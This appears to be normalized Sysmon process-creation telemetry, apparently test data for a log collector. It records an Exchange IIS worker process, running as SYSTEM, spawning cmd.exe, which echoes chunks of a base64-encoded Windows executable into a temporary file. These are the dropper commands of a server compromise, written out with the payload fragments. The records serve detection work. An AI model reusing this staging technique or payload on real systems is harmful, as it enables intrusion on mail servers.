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>>%%TEMP%%\\\\RsJnf.b64\",\"Name\":\"CommandLine\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\\",\"Name\":\"CurrentDirectory\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"User\"},{\"text\":\"{d5e182b9-36b7-641b-e703-000000000000}\",\"Name\":\"LogonGuid\"},{\"text\":\"0x3e7\",\"Name\":\"LogonId\"},{\"text\":\"0\",\"Name\":\"TerminalSessionId\"},{\"text\":\"System\",\"Name\":\"IntegrityLevel\"},{\"text\":\"MD5=911D039E71583A07320B32BDE22F8E22,SHA256=BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527,IMPHASH=272245E2988E1E430500B852C4FB5E18\",\"Name\":\"Hashes\"},{\"text\":\"{d5e182b9-3724-641b-d100-000000002700}\",\"Name\":\"ParentProcessGuid\"},{\"text\":\"10384\",\"Name\":\"ParentProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\inetsrv\\\\w3wp.exe\",\"Name\":\"ParentImage\"},{\"text\":\"c:\\\\windows\\\\system32\\\\inetsrv\\\\w3wp.exe -ap \\\"MSExchangePowerShellAppPool\\\" -v \\\"v4.0\\\" -c \\\"C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\V15\\\\bin\\\\GenericAppPoolConfigWithGCServerEnabledFalse.config\\\" -a \\\\\\\\.\\\\pipe\\\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \\\"C:\\\\inetpub\\\\temp\\\\apppools\\\\MSExchangePowerShellAppPool\\\\MSExchangePowerShellAppPool.config\\\" -w \\\"\\\" -m 0\",\"Name\":\"ParentCommandLine\"},{\"text\":\"NT AUTHORITY\\\\SYSTEM\",\"Name\":\"ParentUser\"}]}}}", "category.generic": "Process", "category.high": "Availability Management", "category.low": "Control", "datafield6": "d5e182b9-36b7-641b-e703-000000000000", "event_src.category": "Other", "event_src.fqdn": "exchange.example.com", "event_src.host": "exchange.example.com", "event_src.hostname": "exchange", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_1_Process_creation", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "1", "normalized": true, "object": "process", "object.account.domain": "nt authority", "object.account.id": "synthetic:system@nt authority", "object.account.name": "system", "object.account.privileges": "System", "object.account.session_id": "999", "object.process.cmdline": "\"C:\\Windows\\System32\\cmd.exe\" /c echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAeGg3SgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAABqtgAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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>>%%TEMP%%\\RsJnf.b64", "object.process.cwd": "c:\\windows\\system32\\inetsrv\\", "object.process.fullpath": "c:\\windows\\system32\\cmd.exe", "object.process.guid": "d5e182b9-2e60-6424-c625-000000002700", "object.process.hash.imphash": "272245E2988E1E430500B852C4FB5E18", "object.process.hash.md5": "911D039E71583A07320B32BDE22F8E22", "object.process.hash.sha256": "BC866CFCDDA37E24DC2634DC282C7A0E6F55209DA17A8FA105B07414C0E7C527", "object.process.id": "2276", "object.process.meta": "Description:Windows Command Processor | Product:Microsoft® Windows® Operating System | Company:Microsoft Corporation", "object.process.name": "cmd.exe", "object.process.original_name": "Cmd.Exe", "object.process.parent.cmdline": "c:\\windows\\system32\\inetsrv\\w3wp.exe -ap \"MSExchangePowerShellAppPool\" -v \"v4.0\" -c \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\bin\\GenericAppPoolConfigWithGCServerEnabledFalse.config\" -a \\\\.\\pipe\\iisipm6ed2a926-10ba-4360-834b-895310382a0a -h \"C:\\inetpub\\temp\\apppools\\MSExchangePowerShellAppPool\\MSExchangePowerShellAppPool.config\" -w \"\" -m 0", "object.process.parent.fullpath": "c:\\windows\\system32\\inetsrv\\w3wp.exe", "object.process.parent.guid": "d5e182b9-3724-641b-d100-000000002700", "object.process.parent.id": "10384", "object.process.parent.name": "w3wp.exe", "object.process.parent.path": "c:\\windows\\system32\\inetsrv\\", "object.process.path": "c:\\windows\\system32\\", "object.process.version": "10.0.17763.1697 (WinBuild.160101.0800)", "recv_ipv4": "127.0.0.1", "recv_time": "2023-04-03T09:59:22.529Z", "status": "success", "subject": "account", "subject.account.domain": "nt authority", "subject.account.id": "synthetic:system@nt authority", "subject.account.name": "system", "subject.account.privileges": "System", "subject.account.session_id": "999", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-03-29T12:26:08.946Z", "type": "raw", "uuid": "f15a1c1b-c289-4061-8603-6aaf687d1569"} +{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"1\",\"Version\":\"5\",\"Level\":\"4\",\"Task\":\"1\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-03-29T12:26:10.052174000Z\"},\"EventRecordID\":\"6959912\",\"Correlation\":null,\"Execution\":{\"ProcessID\":\"3184\",\"ThreadID\":\"4760\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"exchange.example.com\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"-\",\"Name\":\"RuleName\"},{\"text\":\"2023-03-29 12:26:10.050\",\"Name\":\"UtcTime\"},{\"text\":\"{d5e182b9-2e62-6424-c825-000000002700}\",\"Name\":\"ProcessGuid\"},{\"text\":\"7524\",\"Name\":\"ProcessId\"},{\"text\":\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"Name\":\"Image\"},{\"text\":\"10.0.17763.1697 (WinBuild.160101.0800)\",\"Name\":\"FileVersion\"},{\"text\":\"Windows Command Processor\",\"Name\":\"Description\"},{\"text\":\"Microsoft® Windows® Operating System\",\"Name\":\"Product\"},{\"text\":\"Microsoft Corporation\",\"Name\":\"Company\"},{\"text\":\"Cmd.Exe\",\"Name\":\"OriginalFileName\"},{\"text\":\"\\\"C:\\\\Windows\\\\System32\\\\cmd.exe\\\" /c echo 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